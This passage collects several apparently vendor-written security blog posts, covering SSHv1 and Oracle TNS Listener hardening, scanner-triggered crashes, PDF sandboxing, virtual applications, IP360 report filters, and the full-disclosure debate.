2) Locate the "Protocol" line (e.g. Protocol 2,1).
3) Update the line to read "Protocol 2"
4) Restart sshd

If you're dealing with an appliance, you may want to poke your vendor. They may have a patch out or a method of reconfiguring the appliance to disable SSHv1.

That's it, a simple little fix to a problem that simply shouldn't exist today. Tomorrow we'll discuss something else that's been stuck in my craw for a while, when I explain how to turn that S#!T off for SSLv2.

There are two words that I fear more than any other, and I imagine the same is true for most other vendors. Those magical two words that send shivers down spines of support and make grown engineers cry... 'Application Interaction'. The term, used to describe a potential negative impact that one product may inadvertently have on another, is often seen as a "Red Alert, Battlestations" type of scenario. You see, when you develop a product that's designed to identify vulnerabilities, you become more familiar with this term than most other software vendors. The problem is that 99% of the time, the issue isn't yours to fix and "Application Interaction" becomes a thinly veiled way of saying "Vulnerability Discovery". Even though we know what's going on, the nature of the term and the thoughts associated with it lead to vendors squirrelling the term away and the real problem is never discussed.

So why do I consider "Application Interaction" to really mean "Vulnerability Discovery", especially in the context of vulnerability management? Imagine an attacker sending packets to remote systems and causing those remote systems to hang or crash. That would be defined as a Denial of Service and, since we're talking about a remote service, even Microsoft would issue a patch and call it a vulnerability. The problem is that small and/or specialty vendors (like SCADA solution providers) don't always see it that way, their programs start to crash and they tell the customer that the "scanner" is the issue. However, as you can see, scanner and attacker could be used interchangeably in the sentence above. Of course, everyone aims to be non-invasive and no one purposely releases code that will crash a service, but it happens; it's a fact of life that we need to live with. The question is how do we deal with this and the answer should be urging the software developer to issue a patch.

Let's consider the most popular example, printer crashes. The TCP/IP stack in most printers is notoriously fragile, googling for 'port scan printer crash' will demonstrate this, and everyone in the industry is aware of it. Yet printer vendors will point you toward the other vendor involved because nobody wants to rewrite code.

A recent example that I encountered involved some fairly important software for a very important company. The software would crash when scanned; yet when you connected to the software via telnet or netcat, it was fine. We did some fairly extensive testing and discovered something interesting: the software -- remember how important it is -- would only crash if the source port was greater than 32767. Now, when you are using your computer and connect to another device, the ephemeral port is often below 32767. This was the case, however when you're connecting to thousands of ports across potentially thousands of hosts, it's quite easy for your source port to be higher than 32767. This is exactly what was happening, connect with a source port of 32768 or greater, and the service would crash. We'd done everything we could as a company to be non-invasive, yet a programming flaw in the other application lead to an integer being signed instead of unsigned, limiting the port range from a max of 65535 to 32767. We were able to work with the vendor in this case, and they fixed the flaw and released an update. When considering this scenario, keep in mind how important this software was... we cannot forget how dangerous a denial of service in critical software is.

So the next time you encounter an "Application Interaction", work with your vendors and help your vendors work together, the odds are the product that's causing the interaction has found a 0-day in the other application and, ultimately, that's a good thing. The flaw is identified internally, rather than being exploited by a malicious attacker. A fix can be developed, and quickly tested with the two vendors working together. The most important thing to keep in mind is that your security solution, the product that you pay for to keep you secure, is doing it's job and, at that point, possibly exceeding your expectations. You may even end up with a CVE credited to you, and there's nothing wrong with that.

Prior to the release of Oracle 10g, the TNS Listener by default was not secured with a password. In the default state, anyone who could access the TNS Listener remotely could issue commands to it, including shutting it down. The TNS Listener had two security settings: 'OFF', the default state, without a password set, and 'ON' when a password was set.

Starting with 10g, Oracle made the TNS Listener a little more secure, adding a new authentication method, 'Local OS Authentication', and making it the default setting. This setting allows local administration of the TNS Listener by the user who owns the tnslsnr process.

This change split the security 'ON' setting into three different states:

Security ON: Local OS Authentication
Security ON: Password or Local OS Authentication
Security ON: Password

The 'Security ON: Local OS Authentication' and ' Security ON: Password or Local OS Authentication' settings are easy enough to reach with LSNRCTL commands, as the first is the default, and the second by simply setting a password for the listener.

The ' Security ON: Password' setting requires adding a line to the listener.ora file, which is also the same method needed to modify the more elusive setting of 'Security OFF'. The necessary line is:

LOCAL_OS_AUTHENTICATION_ = OFF

If this line is added to the listener.ora file after a listener password has been set, it will change the security status from 'Security ON: Password or Local OS Authentication' to ' Security ON: Password'. However, if you add the line before a password has been set, the security status becomes 'Security OFF'.



With security off the TNS Listener in 10g and later is just as insecure as 9i and earlier versions. While the likelihood of getting into this insecure state unintentionally is decreased since it's no longer the default setting, administrators should still be aware of this possibility. It is just as important to ensure TNS Listener is secured with a password in 10g and later as it was in previous versions. 

Building sandbox functionality into applications is the new standard. Examples include: Office 2010 Protected View and the Chrome sandbox. Even the HTML5 standard includes sandboxing capabilities for iframes. This is a great way to mitigate the number of attacks that can occur by decreasing the size of the attack surface. This does not affect speed in most cases with the same performance that you’d expect from non-sandboxed application.

Users should not be any PDF Reader without the sandbox features that are enabled within them. Example: Adobe X has “Protected Mode” and Foxit 5 has its “Safe Viewer”. If you are not using a PDF viewer without a sandbox, then you are at risk for a high percentage of attacks infecting your environments. You are allowing the PDF to make system calls and write access on the filesystem.

Adobe is quick to release updates but and is vulnerable to more attacks because of their large stake in the marketplace, competitors are not targeted as consistently because of this. So ensure you are updating your Adobe from 9 and earlier to version 10. Issue is most end users in enterprise environments do not patch their systems that consistently. 

Recently, I attended a security conference that included a keynote talk from Mikko Hypponen, Chief Research Officer for F- Secure. He talked about how 60% of large enterprise attacks are intended for Adobe. This type of attack consists of simply spoofing the email header; this involves the attacker changing who the email is sent from. When the target looks at the email, it will probably be someone they know or trust and have exchanged emails previously, for example, “Mike” from accounting. The email would contain an attachment that could simply be “expense report 2011.PDF” with a note explaining “this needs to be reviewed”. The target then opens the expense report attachment with Adobe, the enterprise standard PDF viewer. Adobe then tries to open the PDF, Adobe crashes, and then reloads a valid PDF that looks legitimate. The issue with most end users, if they even notice a crash, will not report it the to their I.T department. They assume everything is normal and system untouched because they are reviewing a legitimate looking PDF. The problem is the user, is already owned and infected. During the talk, one phrase he used was “I do not know why anybody uses Adobe anymore, I hate it, and there are many PDF readers out there that are not targeted”.

This made me ponder that very same question and ask around the industry a little bit by speaking with an executive who recently attended the Gartner Symposium/ITxpo 2011. This is a massive conference with over 10,000 attendees. This executive was in a room full of CIO’s who have a huge influence over their companies IT decisions. They all spoke negatively about Adobe and vented their frustrations over the product.

So let’s recap, in two weeks, at two different conferences with two very different audiences, both expressed dislike Adobe. Given this attitude, how long will it be before people abandon Adobe all together and move to a competitor such as Foxit.

While reading through a recent Microsoft Security Bulletin, I decided to take a look at the page's source code. I am not sure what prompted me to take a look, but it probably has to do with my inquisitiveness. Luckily for me, curiosity has yet to kill this cat.

After sifting through the repetitive lines of script which make up the web page, I came across an interesting tad-bit of information. The site's developers have used an external piece of JavaScript in order to have Internet Explorer properly render HTML5 elements. This JavaScript shim was written by Remy Sharp and is publicly available through Google Code. It has a simple, yet clever way to incorporate HTML5 tags that IE can't yet parse.

This leaves me wondering why Microsoft couldn't simply integrate full HTML5 support into Internet Explorer 9 properly from the get go. Surely when IE9 was being developed, the widespread use of HTML5 wasn't unforeseen. The fact that their developers are using external scripts as a work around is in a way an admission of guilt that IE9 lacks the necessary functionality required to meet today's web browsing needs.

Web applications are increasingly targeted by hackers seeking to cause havoc on networks. This is, at least partially, due to the increase in the number of automated tools that are publicly available on the internet. Not only do Hackers now have more options when carrying out attacks against corporate or government networks, they are able to orchestrate exploits with greater ease. The various exploit frameworks and live CDs can ease the process of successfully breaching the security of a network.

Exploiting known vulnerabilities becomes easier as the process becomes more automated. Web sites don't need to be targeted individually, as tools can be used to automatically scan for vulnerable sites. Public facing network infrastructure, such as web servers, will always be the easiest target. These servers have the difficult task of being secure, while allowing legitimate traffic to continue with as little inconvenience to the legitimate users as possible. Modern web servers can carry a wealth of information that may be useful to the bad guys, making them sought-after targets.

Providing web server security can be a difficult task considering the fact that web developers customize web sites based on specific project requirements. Not all web development is done the same way, making it tricky to ensure any possible vulnerability is covered. Although initial security testing is important to the development and QA teams, continued security testing in a production environment is imperative if administrators want to remain proactive.

Considering the tools that can be used by the bad guys, the good guys need to step up their game and build an arsenal of their own. This is where tools, such as nCircle's WebApp360 product, come into play. By providing a way to automate security checks in a production environment, system administrators are able to keep better track of any vulnerabilities their systems may have. A good defense only gets better if it is constantly being tested and improved.

Network tools are only going to get better and more sophisticated in the future. It is important to keep up with the latest trends as we have all seen what can happen when network administrators let their guard down.

Last week I attended Sector here in Toronto. Unlike previous years, which I spent socializing and attending talks, I spent more time at the nCircle booth. I was surprised at how many people would stop and grab a pen, but even more surprising was the number of people that would take the product materials that were available. People would ask if the materials were already in the Sector bag and, since it wasn't, take copies. When I registered and picked up my Sector bag, I stopped and removed the thick stack of collaterals so that I could toss them.

I'm sure that we're not the only industry that does this, but given our field, it'd be nice to be a driving force in the elimination of marketing collateral. There's nothing wrong with having it available at the booth for people that are genuinely interested, they're probably going to come by and talk to you anyway. I'm sure most people find themselves in my situation and toss these as waste. I'd like to see a conference step up and tell their sponsors that they'll only accept electronic marketing collateral, which will be placed on a branded USB key and included in the registration kit. The conference can then sell the advertising on that USB Key to cover the cost of it; these days a small USB key is so cheap that it'd be easy to do. You can find bulk 256MB keys for less than $3, that means for a conference with 1100 attendees, you're talking about a $3300 expense. Compare that with the ~50K pages of marketing collateral that were likely distributed.

We're at a point where potential customers ask vendors about their compliance with green energy standards, shouldn't their advertising methods be questioned as well?  

I wanted to share some off the advantages of using virtual apps. The first advantage is the ability to streamline or custom tailor applications to suit your environment. You are able to only capture the bare minimum the application requires to run. A perfect example of this is Microsoft Word. Word, when installed on a computer locally, is large in size because It ships with many additional features, such as templates and language packs. You are able to create an English only instance of Word with only the New Document template or you can package the entire application. This decreases the size of the application substantially.

The various options for deployment are fantastic when you're looking at running applications from portable media. You are now able to run most windows based applications from a USB stick. You can create a completely configured virtual application with all the required plug-ins that will run in a sandbox on a USB Stick. This means no more fighting with missing or corrupt DLLs, or as previously discussed, application compatibility conflicts. Another huge advantage is that you are no longer need to install the application, which could take hours, each time you use a new PC. Simply just plug in your USB Stick or portable media.

From a security standpoint there are additional benefits. You are now able to give contractors and trainers access to software without having them (contractor or trainer) administrator rights granted on that pc or network. You can also restrict application access based upon your Active Directory scheme and lock down the application from writing to local OS. Virtual applications also have their advantages for employees, who are able to carry all their application data, as well as the executable application, on a single self-contained, secure USB stick. This means no longer having to carry your laptop or pc home with you. This mobility is even further increased because you are able to deploy on any future release OS without conflicts. You can easily deploy a Windows 2000 application in any Windows environment. As previously mentioned, the product I was using is ThinApp from VMware.

Everything is self-contained and easily deployed. This is a great technology that will see widespread adoption with the increased prevalence of virtual infrastructure and virtual desktop technology.

The best part of any conference is usually the free beer at the reception but this year may be an exception to that rule. The presentation of FireShark by Stephan Chenette may take top spot. It might be that I'm biased because few of the talks at SecTor this year appealed to me (given the numerous vendor sponsored talks, I felt like I was at RSA looking at the schedule). I also missed a few of the talks that I had really wanted to see, which I heard nothing but good things about but wasn't there to judge myself.

The FireShark presentation didn't use PowerPoint or a PDF, which was a nice change, but still didn't alleviate my urge to fall asleep (as discussions of tools often make me do). Fortunately, halfway through we went from presentation to demo and that was the part that spoke to me, it kept me awake, alert, and eager for the remainder of the talk.

FireShark is a tool for analyzing webpages to identify all of the network traffic, using the browser (Firefox) to perform the requests and page rendering. The website suggests the primary uses of FireShark are: Mass Injection Analysis, Redirection Chaining, Deobfuscation Analysis, and Content Profiling. The addition of scripts allow for enhanced analysis and easy extension of the tool's capabilities.

It would be great to see a community rise up around FireShark and a repository of scripts created to expand its analytical capabilities. 

Last week I spoke a bit about two different uses for reporting filters. Filtering by IP Address and filtering by OS group. This week I am going to discuss another. When generating an IP360 scan report, it may be useful to include only those vulnerabilities whose scores exceed a certain threshold. This is relatively simple to do by making use of a custom report filter.

In the IP360 UI, navigate to 'Analyze -> Reporting Filters'. Select 'New' and give your custom filter a descriptive name such as "Vulnerability Score Filter". Under the 'Set Parameters' section, select the 'Vulnerabilities' tab. From the drop-down list of attributes select 'Vuln Score' and change the action to 'Include'. Next you will need to let the reporting filter know what score range you would like to filter based on. In the screenshot below I have entered a score of '5000' as the minimum, and left the maximum blank. This will have the effect of creating a score range of 5000 and up. Click 'Add' to insert this into the filter and click 'Submit' to save.



Now, when you apply this filter to a report, it will only include vulnerabilities that have scores higher than 5000. My score range was just an example, it's important that every organization identify the range of scores deemed critical in their environment and adjust the values accordingly.

Just a quickie here.

I was playing around with my wireless settings yesterday and discovered an interesting difference between Windows 7 and OS X 10.6. A difference that increased the respect I have for some of the security changes Microsoft is making. As a side note, I had the same result with my iPad and iPhone that I had with OS X but I'll stick with just laptops for now.

So I changed from WPA2+AES to WPA+TKIP to test my ISPs theory that my router couldn't handle the encryption load. Both Windows 7 laptops in the house refused to connect, stating that the settings had changed and I was required to remove the wireless network and add it again. OS X, however, was happy to simply reconnect to a network with changed security settings without giving it a second thought.

So kudos to Microsoft for the little bit of forethought that went into that implementation. 

As part of my pursuit of a diploma in Computer Systems Technology, I am required to carry out several internships in between semesters of Classroom study. I have been lucky enough to secure an internship with nCircle's Vulnerability and Exposure Research Team (VERT), which is based in Toronto, Canada.

Lucky because doing an internship at nCircle brings my understanding of the computer world in general to an entirely new level, let alone the security aspect of it. Although the majority of in-class lessons that I have sat through mainly focused on networking protocols and Cisco hardware, it is really just a basic foundation on which to build an understanding of the things that really matter in the InfoSec world. Having the base knowledge of these protocols only gives me a glimpse into how everything works together. Different Operating Systems and Applications utilize these protocols in their own ways to communicate with each other in the modern network. This is where my experience at nCircle comes into play.

In no way do I want to discredit the education that I am currently receiving from my post-secondary institution, however there are definitely things that could be added to the curriculum. As an example, I will note some of the different Operating Systems in use today. There are variations of Unix based systems, Apple's systems, and of course the different products offered by Microsoft to mention a few. Most of these Operating Systems won't be touched in the majority (if not all) of computer courses being offered by post-secondary institutions.

I fully credit nCircle as the reason that my eyes are beginning to open to the world of InfoSec and the many different things it has to offer. It's like being in a never ending chase... you may edge closer and fall further behind, but you will never catch up. The wonderful part of working at nCircle is the continuous learning experience as one task might include Oracle databases on Solaris machines, followed by one which involves MAC OS X with some random applications thrown in between the major tasks. Network security isn't specific to one brand or product line. It involves everything and anything, not to mention the constant influx of new technology that guarantees the need for regular improvement of one's knowledge and skill set.

Although my experience thus far with VERT is relatively short, it is long enough to understand that Network Security goes beyond a 9 to 5 job and becomes a way of life.

Large enterprises have issues maintaining or patching their systems on a consistent basis. There are many reasons for this occurrence. When attempting to patch applications that the business relies on to function, the applications cannot be interrupted for any long period of time. Applications in large scale enterprises sometimes have the need to use specific versions of software, which can sometimes include legacy 16-bit applications, to interact and run. This can cause massive application conflicts. Example: Application A needs to use Java Version 1.5 but they also need to use Application B which uses Java Version 1.3. When a Java update is released then there will be multiple issues created. The system is now vulnerable because of exploitable software present on their system and the application will now crash because of reliance on that specific version of Java. When a new release of an application comes out, example: version 1.00 to 1.50, it can take months of testing and deployment to release that application on a large scale basis, this is because of application conflicts and possible disturbance to the business function. With the ability to use virtual applications we are ensuring that the host OS is kept up to date with latest security patches while maintaining business functionally.

This is possible by using virtual applications that use sandbox technology, by creating a virtual file system and registry for the user. The end user is now able run multiple versions of any application without conflicts. You are also able to make a small virtual application that can package 16-bit and 32-bit.This makes patching your virtual application easy. Software is being separated into component/packages that are bundled into single virtual executable, Example: Internet Explorer and Java being a separate package that you can individually update then recompile. This decreases time when you are dealing with large applications that take time to build. Large scale environments can now have a very quick turn around when an update is released. This decreases man-hours in terms of deployment: overnight delivery of patched applications to thousands of users, no additional issues created when deploying.

So the host OS can be patched immediately when released without application conflict arising and no interruption to the business function, which is the main goal to maintain. The virtual applications are locked down from the local host OS this will help system administrators update vulnerable systems faster and more efficiently. At a previous employer we used VMware ThinApp it is a clientless virtual application that met almost off our needs and were very impressed by the results. Ultimately the end goal is to remove all vulnerable software from a system but this allows for isolation of vulnerable software's attack surface which is a cost effective mitigating factor against an ongoing battle.

Last week I discussed how to use IP360 reporting filters to exclude or include a list of IP addresses when generating a report. This week I am going to show you how to create a report consisting of only hosts with a specific operating system class. For example, let's walk through the process for creating a report filter that generates a report of only Windows hosts.

First, navigate to 'Analyze -> Reporting Filters' and click 'New' to create a new reporting filter. Give your filter a name such as "Windows Hosts Only" and proceed to the 'OS Groups' tab. Next, select the 'Include' action and double-click 'nCircle: Windows' from the available list. The selection will move over into the selected box. You can now click 'Add', and the filtering rule will appear below. Now that you have completed the filter, click 'Submit' to save.



 

Now that your filter is complete, you can apply it to any report you are generating to restrict the hosts in the report to Windows boxes only.
 

If you wish to create your own OS Group, or modify existing ones, you can navigate to 'Analyze -> OS Groups' and either click on 'New' or select an existing filter to view it. In existing filters such as 'nCircle: Windows' you see the operating system tree for Windows is a different colour than the other operating systems in the list, as these are the ones currently selected. Selecting a parent will create a group that includes all of that parent's children.

 

Today I will be talking a bit about a specific subset of the report filteringfunctionality of IP360. If you are like me, you often need to create a report containing, or excluding a specific list of IP addresses. This is where the 'Fine Tune' tab in the report filter section of IP360 comes in handy. I will walk through the process for creating and using a report filter to serve this purpose.

Begin by navigating to 'Analyze -> Reporting Filters' in the IP360 interface and clicking on 'New'. Give a logical name to your filter such as "Excluding/Including IP List" and then continue to the 'Fine Tune' tab. You will be presented with several drop-down boxes. From the 'Attribute' box, select 'IP/IP Range' and change the 'Action' to 'Include' or 'Exclude' based on the desired result. Next, enter your IP Address or range in the text box and click 'Add'.

Below is a screenshot of a reporting filter I have set up to exclude a list of hosts from my report.



After saving your reporting filter, begin generating a report of your choosing.When configuring options for report generation, the second step, 'Select a Reporting Filter', will allow you to apply the reporting filter you just created. Double-click your filter to move it into the 'Selected' section as illustrated below. Click the 'View' button to generate your report with the selected filter applied.



Now that you've seen how reporting filters can save you time and simplify reporting, it's time to really make use of them. Next week, we'll take a more in-depth look at  some of the additional functionality offered by reporting filters.

The "full disclosure" vs "responsible disclosure" debate has been going on for years, and I doubt it will ever end but recently we seem to have hit a point of critical mass. First we had the "no more free bugs" movement and more recently we have had a series of 0-day vulns dropped under the guise of "full disclosure". I say that it's under the guise of full disclosure because it's not full disclosure. FD is about making companies that refuse to acknowledge vulnerabilities stand up and deal with them... it's not about tooting your own horn and saying "hey look at me". I'd like to think that my arguments in favour of FD in the past give me some ground to stand on as I begin this little diatribe.

Things that are happening lately, and by things, I mean Tavis dropping the Help and Support Center 0-day 5 days after notifying Microsoft, do not qualify as FD. It's being called FD but it's not. Full Disclosure is not the absence of Responsible Disclosure, it is, in the end, an extension of it, designed to call out companies that are not responsive to RD.

Dropping this 0-day was a stupid thing to do... there's no room for additional discussion to be had; it's a plain and simple point. If Microsoft had not acknowledged it after a month, or refused to fix it, then sure... use FD as it is intended... but that's not what happened. My comment is the office after the 0-day was dropped was that my next blog post should be entitled "Tavis is the new Gobbles".

I've been, on occasion, a fairly harsh critic of Microsoft, but in this situation I imagine I was doing the same thing that they were doing. If I were in a cartoon, I'd have had a thought bubble that simply read, "WTF?" but I suppose that people will do what they want to do.

I had intended to leave this topic alone but Brad Spengler posted to DailyDave yesterday and inspired me to write this post. In his post he decided to take the FD another step backwards and present Tavis with kudos for waiting only 5 days. He also called out a number of individuals for speaking against the claimed "FD". This list included Robert Hansen and Andrew Storms, two people I respect and consider to be good friends.

Robert's post on the subject was one of the first I read, and I found myself agreeing with it. I tend to run things by my employer before I discuss them if I expect controversy, whether I'm writing about them here or on my personal blog. We then look at the best way to approach something and handle it in a responsible manner.

As for Andrew, Brad chose to simply insult him and his intelligence. I've worked with Andrew for four years and we don't always see eye to eye (he's responsible for protecting our network and I want to break it ) but we're always chatting about things that are happening in the industry and our thoughts on them. On Patch Tuesday, if Andrew points to a patch as being an important one to apply, you can be damn sure that, from the enterprise point of view, it's the first one you want to apply. He's not pointing to specific vulnerabilities and talking about their inner workings, he's speaking as an experienced Director of Security Operations with regard to enterprise networks. It is unfortunate that Brad decided to ignore this and simply made a personal attack.

In the end I think that both Tavis and Brad brought us back a step. The actions that Tavis took indicate that he feels that Full Disclosure and Responsible Disclosure are completely disjoint from each other, while Brad resorted to personal attacks as a defense mechanism.

In the end, until the security community can accept that Full Disclosure exists within Responsible Disclosure we're going to have continuous FD debates. Personally, I'm getting tired of reading them and wish people would acknowledge that tagging something with "Full Disclosure" doesn't absolve them of all responsibility.